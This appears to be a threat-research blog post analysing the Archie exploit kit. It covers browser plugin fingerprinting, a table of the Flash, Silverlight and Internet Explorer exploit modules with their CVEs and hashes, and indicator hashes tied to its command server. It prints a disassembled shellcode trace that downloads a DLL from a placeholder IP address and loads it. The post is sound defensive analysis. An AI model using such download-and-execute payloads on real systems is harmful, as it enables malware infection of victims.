We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems.
The number of Exploit Kits available has experienced exponential growth in the last few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and Angler. In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf.
Archie is a really basic Exploit Kit that uses different exploit modules copied from the Metasploit Framework. When the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information about Flash, Silverlight and Acrobat Reader versions and the information is sent to the server.
It also uses the following trick to check whether or not the system is running a 64-bit version of Internet Explorer. We documented this trick in previous blog posts.
Depending on the Silverlight, Internet Explorer and Flash versions, it will try to load a different exploit module including:
Filename | CVE | Affected Software | MD5 |
---|---|---|---|
flashlow.swf | CVE-2014-0497 | Flash | 4f3f7b896ab69ec2c082709220000b38 |
flashhigh.swf | CVE-2014-0515 | Flash | 18e0629ba830f0894268aa1dca92ea78 |
silverapp1.xap | CVE-2013-0074 | SilverLight | f1759371fe6c7f46ca3c82edd456eca2 |
iebasic.html | CVE-2013-2551 | Internet Explorer | e9fbd007f6fa2f188c090f535da7ca4a |
Archie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them.
If we disassemble the shellcode we can see it is a basic download and execute payload.
4010bb LoadLibraryA(urlmon)
401089 VirtualAlloc(base=0 , sz=400) = 60000
4010ce GetTempPath(len=104, buf=60000) = 14
4010a7 URLDownloadToFile(http://IPADDRESS:PORT/dd, C:usersuserTempe.dll)
401108 LoadLibraryA(C:usersuserTempe.dll)
401114 Sleep(0x3a98)
The shellcode downloads a DLL from the webserver, writes it in Users[Current_user]Tempe.dll and then loads it.
The IP address where the Archie Exploit Kit is hosted, and the piece of malware delivered, is also being used for click fraud operations. It is related to this research published by Kimberly on the click fraud bot http://stopmalvertising.com/malware-reports/anatomy-of-a-net-click-fraud-bot.html [no longer available].
Following is the list of hashes that we have found connecting to the same C&C:
17b077840ab874a8370c98c840b6c671
7bd2207dcef1878109e88a4527162d09
89c136eae9163d63918e0ef59bd6ac82
d1b11795c3e3736de834abc39f7bd76a
1d648b48d1e2b0f2855e2659f32c94ad
48feab46efc26519820e5b8a9152e529
e54d5fef5e3c050f529e814dca4d8014
83f5aef0de9da8cb813c5c8ffbaf1ead
b47739296783ac7fced9ccb49c833ae8
09102b0fe2be8b85136d454b14ec7398
dbcb2d297e5d79c5a161801b2be775ba
30b729137b5ee8805e3e9cc1dbb75609
a615334472c30ee680f798e3849def66
8268f911c87a33f29c00af1dd2c1c2a6
389c5931703a031faebf5f5406f86752
2da11eb62f514abc2ea68271655cb791